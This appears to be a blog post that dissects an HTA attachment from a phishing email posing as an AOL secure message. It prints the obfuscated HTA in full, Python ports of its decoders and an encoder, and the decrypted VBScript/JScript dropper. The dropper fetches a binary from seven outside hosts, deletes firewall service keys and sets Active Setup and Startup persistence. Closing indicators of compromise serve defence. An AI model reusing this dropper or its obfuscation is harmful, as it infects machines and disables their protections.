I got a mail from noreply@aol.com with the subject: Secure Message from AOL.com user.
Body of the email:
——————————–
You have received Secure Message
To read the message open attached file.
User ID: 42470
Password: 43019321
Keep your password in a safe place.
Sincerely,
Encrypted Message Service,
AOL.com
——————————-
There was one attachment too: mail.zip
I was pretty sure that the attachment was a virus. Still, out of curiosity, I detached the zip file and unzipped it.
There was only one file in the archive: message.hta
I did some searching for the .hta extension and its default application in Windows. HTA stands for “HTML Application”. Windows opens such a file with mshta.exe, the HTML Application host, which renders it with the Internet Explorer engine but treats it as a trusted local program: none of IE's security-zone restrictions apply, so the script can create ActiveX objects such as WScript.Shell and Scripting.FileSystemObject, read and write the registry, and start programs. Double-clicking an HTA is, in effect, running an executable.
I opened the file in an editor to view its contents. It was a very beautifully written and encoded JavaScript function with an embedded self decoder. Being a programmer myself, I could understand this much by having a glance at it.
Following is the content of the file. I have deliberately replaced all <> with [] in all HTML tag names.
————————————
<html><head><title>qqrqjhq</title></head><body>[script language="JavaScript"]function gl(cp,la,mm,io){xll=6863;io=unescape(io+la+cp);eval(io);h(mm);};gl(”.charA%74%28%78)%3Bf%3Dw%2Ein%64%65%78Of%28%69%29%3Bi%66%28f>-%31)%7B%6B%3D%28%28%66%2B1)%25%38%35%2D%31)%69%6(k<%3D0%29%7B%6B+%3D85}%67+=%77%2E%63%68%61%72%41t(k%2D%31%29}e%6Cs%65{i%66(%69%3D=%22%24%22)i%3D%22%5C%5C%22%3B%69f%28%69=%3D%22^%22%29%69%3D%22%5C%22%22%3B%67%2B=i}}%3Bdocu%6D%65nt.%77r%69%74%6(g)}”,”5%20%7A%64f%21Q%551%26(o%2B%43B%68%29%6C%48e%6A%2C%2D%44%67%4F%2E0K%45%6BFGIL]%4Dm%52S%22,e%3D”%3B%66%6F%7(%78%3D%30%3Bx%3Cq%2Ele%6Egt%68;%78%2B+)%7Bi%3Dq”,”B+ccjX’ZcOz’+z{.]0X+RztjX8vjzRPZHztjv=jv000<txvzr></txvzr>’zHPcO8POjqiP=P6XvZr’>!8cX’Z+czfolNf+X8Rjc’0~vZ’joY1cPWHjz+zB+ccjX’z'+z6jv=jv0z_HjPtjzX)jXFz}+8vzLc’jvcj’zX+ccjX’Z+czPcfz’v}zPOPZc0<txvzr’zhpco8pojqip=p6xvzr’>X,q8cjtXPrjo^%B^lbfvq^X/^CX,C^SjX}XHjf^CX,b,qfvC^8tjvZcZ’0jpj^bcpq&b’v}NHqcj~z{X’Z=j7.W</txvzr’zhpco8pojqip=p6xvzr’>,jX’o^6XvZr’ZcO0GZHj6}t’jR.W,jX’^lb+qcj~z{X’Z=j7.W,jX’o^n6XvZr’06)jHH^lbZ!oH0GZHjkpZt’to,llNjpqH0Ij’GZHjo,lbZ!ojp0tZdj>TKKKKlcpqKb5H0BvjP’jG+Hfjvofvlb5XP’X)o’&lN5b!8cX’Z+cz!4olNvj’8vcz!PHtj5f+X8Rjc’0+cX+c’jp’Rjc8q!4b<$`tXvZr’><txvzr’zhpco8pojq^></txvzr’zhpco8pojq^>=Wt^>L!zcpz;)jc$ctj’zLkqBvjP’j.W,jX’o^Lc’jvcj’kprH+vjv{rrHZXP’Z+c^l$cLk0VZtZWHjqK$c68Wz6r$cn)ZHjzLk0h8t}q’v8j$cnjcf$ckcfz68W$c8vq{vvP}o^)++r0FPdPc0Wd$`O+f0′p’^-^r+H+r0!vjjX++HtZ’j0X+R$`’jt’0′p’^-^!v440W0v8$`+H0′p’^-^c+HF+0′40X+R$`O+f0X^-^,R+4&0W0v8$`WZO0′p’^-^rtZpZ0~+H0Wd$`’jt’0′p’^-^f88~0cR0v8$`+H0′p’^l$cG+vz8cqKz+z$cLk0yP=ZOP’jo8vo8cll$c6r$crqLk0g+X8Rjc’0W+f0Zccjv;jp’$cL!z]jcorl>KKKKz;)jc$ckpZ’zG+v$ckcfzL$crq^^$cyjp’$c68WzWt$ccq]jcorl$cL!ocl;)jc$cvq^{hBgkGIeLiE]my._US6;1Vn7@uPWXfj!O)Z,FHRc+r#vt’8=~p}dK&T4*:waxC$`^$cG+vzWq&amp;amp;amp;amp;amp;z+zcz6′jrz*$ctq4$c‘qK$cG+vz8qKz+z4$c=qmZfor-WC8-&l$cL!z=q^q^z;)jc$ctqtD&$cdqK$ckHtjL!z=q^?^z;)jc$c6j’zRqH0BvjP’j;jp’GZHjo,-;v8jl$cR0nvZ’jzP$cR0BH+tj$ckpZ’z68W$ckHtj$cdqLc6′vo&-v-=-=WhZcPv}B+RrPvjlD&$ckcfzL$c’q:*A’Cd$cyjp’$c’qejpo
’l$c’q6′vZcOo:D]jco’l-^K^l(’$cXqB)voBh}’jo^(e^(mZfo’-&-TlllCB)voBh}’jo^(e^(mZfo’-4-TlllCB)voBh}’jo^(e^(mZfo’–Tlll$cPqP(]j!’oX-tl$cyjp’$ckcfzL$ckcfz68W$ckcfzL$cWt$c+0SjOnvZ’jz^eEB1$$6+!’~Pvj$$mZXv+t+!’$$Lc’jvcj’zkprH+vjv$$RPH^-^FPrZH0X))PWvPcP8FvZ0X+R^-^SkI36u^<$`tXvZr’><txvzr’zhpco8pojqip=p6xvzr’>!8c</txvzr’zhpco8pojqip=p6xvzr’>X’Z+cz!&amp;amp;amp;amp;olNW&qKb!8cX’Z+cz!TocPlNWTqKbv&q^eE]m^CX,C^6@6;km^CX,C^B8vvjc’B+c’v+H6j’^CX,C^6jv=ZXjt^CX,b’v}N+0SjOgjHj’jov&CcPCX,lbWTq&amp;amp;amp;amp;amp;b5XP’X)o’&lN5bvj’8vcoWTlb5vTq^eE]m^CX,C^6.G;n{Sk^CX,C^mZXv+t+!’^CX,bFjq^{X’Z=jz6j’8r^CX,C^Lct’PHHjfzB+Rr+cjc’t^CX,C^NBg{Bx&hD{kwhDka{DKB*BDk:&:KwxwTG45^CX,C^6′8WrP’)^bZ!o!To^rXZrZR^lC!To^rXL__tB^lC!To^SPrgv=^lC!To^GZvj_m^lC!To^ERpGZHj^llW&q&b’v}N+0SjOnvZ’jovTCFj-,-^SkI36u^lb+0SjOSjPfovTCFjlb5XP’X)o’&lN’v}NH0B+r}GZHjo,-+0SjOSjPfovTC^nZcf+~t^CX,C^B8vvjc’VjvtZ+c^CX,C^kprH+vjv^CX,C^6)jHHzG+Hfjvt^CX,C^B+RR+cz6′Pv’8r^lCX,lb5XP’X)o’&amp;amp;amp;amp;lNW&qK5b5bvj’8vcoW&lb5′v}NZ!ocp((Q!&oll+0v8co,lb5XP’X)o}lN5b<$`tXvZr’>Ylb5btj’;ZRj+8′o^fol^-Klb<`tXvZr’>”,”func%74ion%6(q%29{v%61ri%2Cx%2C%6B%2C%66,%67%3D”,w=%226%3A%2F%60%32T;%62%57%6Ec%58%37w%7E%39%78%70rv=%71#s%74%27Y@%7CJ%69Z%75%38a%50%5F3%34*A%7BNy%7D%3″);</script></body></html>
————————————
I tried to understand the contents of the file. Following is what I made out of it.
The file contains JavaScript written to do its malicious work as soon as the user double-clicks the HTA file. In the JS, the very first line is a function declaration. I have done the indentation for clear understanding.
function gl(cp,la,mm,io){ xll=6863; io=unescape(io+la+cp); eval(io); h(mm);};
The function accepts four parameters: cp, la, mm and io. It declares a variable xll = 6863 (which is never used again; it is only padding), URL-decodes (unescape) the concatenation of the 4th, 2nd and 1st parameters, in that order, executes the decoded output with eval, and finally calls the function h, which that eval has just defined, with mm (the 3rd parameter) as its argument.
The parameters are passed in a scrambled order not just to add one level of confusion, but to split the malicious code into fragments and jumble them, so that no contiguous string in the file looks like the real decoder. Some antivirus products would fail at this step alone.
The second line in the JS is just a call to this function with the following parameters:
PARAM cp:
“.charA%74%28%78)%3Bf%3Dw%2Ein%64%65%78Of%28%69%29%3Bi%66%28f>-%31)%7B%6B%3D%28%28%66%2B1)%25%38%35%2D%31);%69%66(k<%3D0%29%7B%6B+%3D85}%67+=%77%2E%63%68%61%72%41t(k%2D%31%29}e%6Cs%65{i%66(%69%3D=%22%24%22)i%3D%22%5C%5C%22%3B%69f%28%69=%3D%22^%22%29%69%3D%22%5C%22%22%3B%67%2B=i}}%3Bdocu%6D%65nt.%77r%69%74%65(g)}”
PARAM la:
“5%20%7A%64f%21Q%551%26(o%2B%43B%68%29%6C%48e%6A%2C%2D%44%67%4F%2E0K%45%6BFGIL]%4Dm%52S%22,e%3D”%3B%66%6F%72(%78%3D%30%3Bx%3Cq%2Ele%6Egt%68;%78%2B+)%7Bi%3Dq”
PARAM mm: It's a long string of text which looks like garbage at first glance. I'll take it up later.
PARAM io:
"func%74ion %68(q%29{v%61r i%2Cx%2C%6B%2C%66,%67%3D'',w=%226%3A%2F%60%32T;%62%57%6Ec%58%37w%7E%39%78%70rv=%71#s%74%27Y@%7CJ%69Z%75%38a%50%5F3%34*A%7BNy%7D%3"
The line io=unescape(io+la+cp); in the function declaration URL-decodes the concatenated string io+la+cp. Note that io ends in the incomplete escape %3 and la begins with the character 5, so the escape %35 (the digit 5) only exists once the fragments have been joined; a scanner that decodes each string literal on its own gets a different, broken result.
As a result the variable io would contain (again indented for clear understanding):
function h(q){
  var i,x,k,f,g='',w="6:/`2T;bWncX7w~9xprv=q#st'Y@|JiZu8aP_34*A{Ny}5 zdf!QU1&(o+CBh)lHej,-DgO.0KEkFGIL]MmRS",e='';
  for(x=0;x<q.length;x++){
    i=q.charAt(x);
    f=w.indexOf(i);
    if(f>-1){
      k=((f+1)%85-1);
      if(k<=0){k+=85}
      g+=w.charAt(k-1)
    } else {
      if(i=="$") i="\\";
      if(i=="^") i="\"";
      g+=i
    }
  };
  document.write(g);
}
This is the declaration of the function h, which the next line, eval(io);, brings into existence, and which is finally called with mm as its parameter in the line:
h(mm);
h is the real decoder, and it is less advanced than it looks: a monoalphabetic substitution over the 85-character reference string w (hence the %85). For every character of mm that occurs in w, it emits the character one position earlier in w, wrapping from the first character round to the last; “$” stands for a backslash and “^” for a double quote, and anything not in w (such as %, < and >) passes through unchanged. The k=((f+1)%85-1) arithmetic is just that shift written confusingly, and e is declared but never used. In the end, the function simply writes the output into the HTML of the page:
document.write(g);
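Both decoding stages, as an added example in Python (this is my re-implementation, not code from the HTA or from the original post). stage1() mirrors the io=unescape(io+la+cp) line, h_decode() is a port of h(), and h_encode() is the inverse, which the attacker's obfuscator must have used; it is included to show that the digit 5 encodes to a space, which is why a copy of mm that has lost its whitespace also loses every 5. IO, LA and CP are the three parameters exactly as listed above (the typographic quotes in la restored to '' and the stray space in cp removed); the 21-character sample ciphertext is the start of PARAM mm.

```python
import urllib.parse

# Reference alphabet w of the recovered h(): 85 distinct characters.
# The "%3" ending PARAM io and the "5" starting PARAM la join to "%35" = "5".
W = ("6:/`2T;bWncX7w~9xprv=q#st'Y@|JiZu8aP_34*A{Ny}"
     "5 zdf!QU1&(o+CBh)lHej,-DgO.0KEkFGIL]MmRS")
assert len(W) == 85 and len(set(W)) == 85

# PARAM io, la and cp as they appear in the HTA (4th, 2nd and 1st argument of gl).
IO = ("func%74ion %68(q%29{v%61r i%2Cx%2C%6B%2C%66,%67%3D'',w=%226%3A%2F%60%32T;"
      "%62%57%6Ec%58%37w%7E%39%78%70rv=%71#s%74%27Y@%7CJ%69Z%75%38a%50%5F3%34*A%7BNy%7D%3")
LA = ("5%20%7A%64f%21Q%551%26(o%2B%43B%68%29%6C%48e%6A%2C%2D%44%67%4F%2E0K%45%6BFGIL]%4Dm%52S"
      "%22,e%3D''%3B%66%6F%72(%78%3D%30%3Bx%3Cq%2Ele%6Egt%68;%78%2B+)%7Bi%3Dq")
CP = (".charA%74%28%78)%3Bf%3Dw%2Ein%64%65%78Of%28%69%29%3Bi%66%28f>-%31)%7B%6B%3D%28%28%66%2B1)"
      "%25%38%35%2D%31);%69%66(k<%3D0%29%7B%6B+%3D85}%67+=%77%2E%63%68%61%72%41t(k%2D%31%29}"
      "e%6Cs%65{i%66(%69%3D=%22%24%22)i%3D%22%5C%5C%22%3B%69f%28%69=%3D%22^%22%29%69%3D%22%5C%22%22"
      "%3B%67%2B=i}}%3Bdocu%6D%65nt.%77r%69%74%65(g)}")


def stage1(io: str, la: str, cp: str) -> str:
    """Mirror of `io = unescape(io + la + cp)`: join the fragments in 4th-2nd-1st
    order, then percent-decode. An escape split across a boundary ("%3" + "5")
    is only valid after the join, so decoding the literals separately fails."""
    return urllib.parse.unquote(io + la + cp, encoding="latin-1")


def h_decode(q: str) -> str:
    """Port of h(): a character found in W is replaced by the one before it in W
    (W[0] wraps to W[84]); '$' -> backslash, '^' -> double quote; anything
    else (e.g. '%', '<', '>') is copied through unchanged."""
    out = []
    for ch in q:
        f = W.find(ch)
        if f > -1:
            k = (f + 1) % 85 - 1          # equals f, except f == 84 -> -1
            if k <= 0:                    # f == 0 or f == 84
                k += 85
            out.append(W[k - 1])          # i.e. W[(f - 1) % 85]
        elif ch == "$":
            out.append("\\")
        elif ch == "^":
            out.append('"')
        else:
            out.append(ch)
    return "".join(out)


def h_encode(s: str) -> str:
    """Inverse of h_decode(): shift forward by one in W, escape backslash and
    double quote. The digit '5' is W[45], so it encodes to W[46], a space."""
    out = []
    for ch in s:
        if ch == "\\":
            out.append("$")
        elif ch == '"':
            out.append("^")
        else:
            f = W.find(ch)
            out.append(W[(f + 1) % 85] if f > -1 else ch)
    return "".join(out)


if __name__ == "__main__":
    print(stage1(IO, LA, CP))                      # the recovered function h(q){...}
    print(h_decode("B+ccjX'ZcOz'+z{.]0X+R"))      # start of mm: the cover text
    print(repr(h_encode('cj=unescape("%5C")')))    # note the space where the 5 was
```

Running it shows that mm begins with the cover text “Connecting to AOL.com…” before the script that the listing below starts with, and that h_encode('cj=unescape("%5C")') produces a ciphertext containing a space: strip the whitespace from mm and the decoded string reads "%C".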
Following is the decrypted form of mm (again indented for clear understanding):
function d(){
  document.write('Unable To Connect to Server. Please check your Internet connection and try again.
  <script language=JavaScript>
    cj=unescape("%5C");          /* a backslash; cj is the path separator everywhere below */
    dr="c:"+cj+"Recycled"+cj;    /* the Recycled folder in the root of C: */
    j=dr+"userinit.exe";         /* the drop location for the downloaded binary */
    nx=1;
    try{
      l=new ActiveXObject("Scripting.FileSystemObject");
      o=new ActiveXObject("WScript.Shell");
      if(l.FileExists(j)){ ex=l.GetFile(j); if(ex.size>20000) nx=0; }   /* already dropped: skip the download */
      l.CreateFolder(dr);
    }catch(t1){};
    function f3(){ return false } document.oncontextmenu=f3;   /* no right-click menu, hence no View Source */
  </script>
  <script language="vbs">
    If nx Then
      set IE=CreateObject("InternetExplorer.Application")
      IE.Visible=0
      Sub Sp
        While IE.Busy=true
        Wend
      End Sub
      ur=Array("hoop.kazan.bz/god.txt","poljop.freecoolsite.com/test.txt","fr33.by.ru/ol.txt","nolko.t3.com/god.c","jmo31.by.ru/big.txt","psixi.wol.bz/test.txt","duuw.nm.ru/ol.txt")
      For un=0 To 6
        IE.Navigate(ur(un))
        Sp
        p=IE.Document.body.innerText
        If Len(p)>0000 Then
          Exit For
        End If
        p=""
      Next
      Sub bs
        n=Len(p)
        If(n) Then
          r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
          For b=1 To n Step 4
            s=3
            t=0
            For u=0 To 3
              v=Mid(p,b+u,1)
              If v="=" Then
                s=s-1
                z=0
              ElseIf v="?" Then
                Set m=l.CreateTextFile(j,True)
                m.Write a
                m.Close
                Exit Sub
              Else
                z=InStr(1,r,v,vbBinaryCompare)-1
              End If
              t=64*t+z
            Next
            t=Hex(t)
            t=String(6-Len(t),"0")&t
            c=Chr(CByte("&H"&Mid(t,1,2)))+Chr(CByte("&H"&Mid(t,3,2)))+Chr(CByte("&H"&Mid(t,5,2)))
            a=a&Left(c,s)
          Next
        End If
      End Sub
    End If
    bs
    o.RegWrite "HKCU\\Software\\Microsoft\\Internet Explorer\\mal","email@yourdomain.com","REG_SZ"
  </script>
  <script language=JavaScript>
    function f1(){
      b1=0;
      function f2(na){
        b2=0;
        r1="HKLM"+cj+"SYSTEM"+cj+"CurrentControlSet"+cj+"Services"+cj;
        try{ o.RegDelete(r1+na+cj); b2=1; }catch(t1){};   /* deletes the whole service key */
        return(b2);
      }
      r2="HKLM"+cj+"SOFTWARE"+cj+"Microsoft"+cj;
      ke="Active Setup"+cj+"Installed Components"+cj+"{CDAC91B-AE7B-E83A-0C4C-E61607972F3}"+cj+"Stubpath";
      if(f2("pcipim")+f2("pcIPPsC")+f2("RapDrv")+f2("FirePM")+f2("KmxFile")) b1=1;
      try{
        o.RegWrite(r2+ke,j,"REG_SZ");   /* persistence: Active Setup runs the StubPath for each user at logon */
        o.RegRead(r2+ke);
      }catch(t1){
        try{
          l.CopyFile(j,o.RegRead(r2+"Windows"+cj+"CurrentVersion"+cj+"Explorer"+cj+"Shell Folders"+cj+"Common Startup")+cj);   /* fallback: the all-users Startup folder */
        }catch(t1){ b1=0 };
      };
      return(b1);
    }
    try{ if(nx&&!f1()) o.run(j); }catch(y){};
  </script>');
};
setTimeout("d()",0);
A caveat on this listing. In w the digit 5 is immediately followed by a space, so h encodes every 5 as a space, and the copy of mm reproduced earlier in this post has lost its spaces; the three missing 5s that context forces are restored above: the %5C (backslash) escape, since cj is the path separator throughout, the 5 in the base64 alphabet r, and Mid(t,5,2). The variable name ur in ur=Array(...) (the loop indexes ur(un)), the space in “Internet Explorer”, the host name psixi.wol.bz and the line a=a&Left(c,s) that accumulates the decoded bytes were likewise recovered from the mm string. Len(p)>0000 is reproduced as it decodes; the real threshold cannot be recovered from this copy.
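The dropper's hand-rolled base64 loop (Sub bs above), ported to Python as an added example that is not part of the original post, so that a captured god.txt or test.txt can be decoded offline exactly the way the dropper decodes it: four characters at a time, one byte fewer per “=” seen, and stopping at the first “?”. The alphabet R is the VBScript one with the lost 5 put back. The payload is constructed for the example: standard base64 of a few bytes, followed by the “?” marker and trailing text, which is what the fetched page presumably looked like.

```python
from typing import Optional

# Alphabet r of the dropper's VBScript decoder.
R = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def dropper_b64_decode(p: str) -> Optional[bytes]:
    """Port of Sub bs. Consume p in groups of four characters, accumulate
    t = 64*t + z, emit the three bytes of t minus one per '=' seen
    (Left(c, s)), and write what has been decoded as soon as a '?' is met.
    If no '?' ever appears the dropper writes nothing, hence None."""
    out = bytearray()
    for b in range(0, len(p), 4):
        s = 3
        t = 0
        for u in range(4):
            v = p[b + u] if b + u < len(p) else ""   # Mid() past the end is ""
            if v == "=":
                s -= 1
                z = 0
            elif v == "?":
                return bytes(out)                      # m.Write a ; Exit Sub
            elif v == "":
                z = 0                                  # InStr(1, r, "") is 1, so z = 0
            else:
                z = R.find(v)                          # InStr(1, r, v, vbBinaryCompare) - 1
                if z < 0:
                    # Any character outside the alphabet (a newline, a space) makes
                    # t negative; Hex(t) is then 8 digits long and String(6-Len(t),"0")
                    # fails, so the dropper would die with a runtime error here.
                    raise ValueError(f"character {v!r} not in alphabet")
            t = 64 * t + z
        out += t.to_bytes(3, "big")[:s]                # Chr()+Chr()+Chr(), then Left(c, s)
    return None


# Constructed sample: standard base64 of b"MZ\x90\x00hell" (the start of a fake
# PE header) followed by the '?' terminator and trailing page text.
SAMPLE = "TVqQAGhlbGw=?<end of page>"

if __name__ == "__main__":
    print(dropper_b64_decode(SAMPLE))        # b'MZ\x90\x00hell'
    print(dropper_b64_decode("TVqQAA=="))    # None: no '?' marker, nothing is written
```

Two properties of the real decoder fall out of this port: the downloaded text must consist of nothing but alphabet characters up to the “?” (any stray whitespace aborts the decode), and a page that lacks the marker, for example an ISP's "domain parked" placeholder served from one of the seven dead hosts, leaves userinit.exe unwritten even though Len(p) was non-zero and the loop over the URLs stopped there.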
So the decrypted mm is a complete first-stage dropper, and the “Unable To Connect to Server” text is only cover while it works. It creates a Recycled folder in the root of C: and checks whether C:\Recycled\userinit.exe, larger than 20,000 bytes, is already there; if so nx is cleared and the download is skipped. Otherwise it opens a hidden Internet Explorer instance and walks through seven URLs until one returns a non-empty page, which it expects to be a base64-encoded executable terminated by a “?” marker. (The VBScript can use l, j, o and nx from the JavaScript block because in IE and mshta every script block on a page, whatever its language, shares one global scope.) The base64 is decoded by hand and written to C:\Recycled\userinit.exe, a name chosen to blend in with the genuine userinit.exe in System32. A marker value is then written to HKCU\Software\Microsoft\Internet Explorer\mal; its content, email@yourdomain.com in the listing, has the form of an e-mail address, presumably so the attacker can later tell which mailing an infection came from.
The last block is the cleanup and persistence. f2 deletes whole keys under HKLM\SYSTEM\CurrentControlSet\Services; the five names look like a personal firewall's driver services, and removing their entries stops them loading at the next boot. f1 then registers the dropped file as an Active Setup Installed Components StubPath, which Windows executes for each user at logon, and if that fails (no rights to HKLM) copies the file into the all-users Startup folder instead. The final line runs the binary immediately only when f1 returns 0, that is, when none of those services existed or when neither persistence method worked; if a firewall was just disabled, execution is left to the reboot that persistence guarantees.
If you think a machine has run this, check for C:\Recycled\userinit.exe, the StubPath under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{CDAC91B-AE7B-E83A-0C4C-E61607972F3}, an extra entry in the Common Startup folder, and the HKCU\Software\Microsoft\Internet Explorer\mal value; the seven host names above are the only network indicators this stage gives you. A mail gateway that drops .hta attachments, including those inside zip files, stops this before anyone gets the chance to double-click.
Cool… so now we have viruses doing malicious stuff, and all of it is coded in JavaScript…
Have you checked the file with some antivirus, to see whether it detects the file as a virus or not?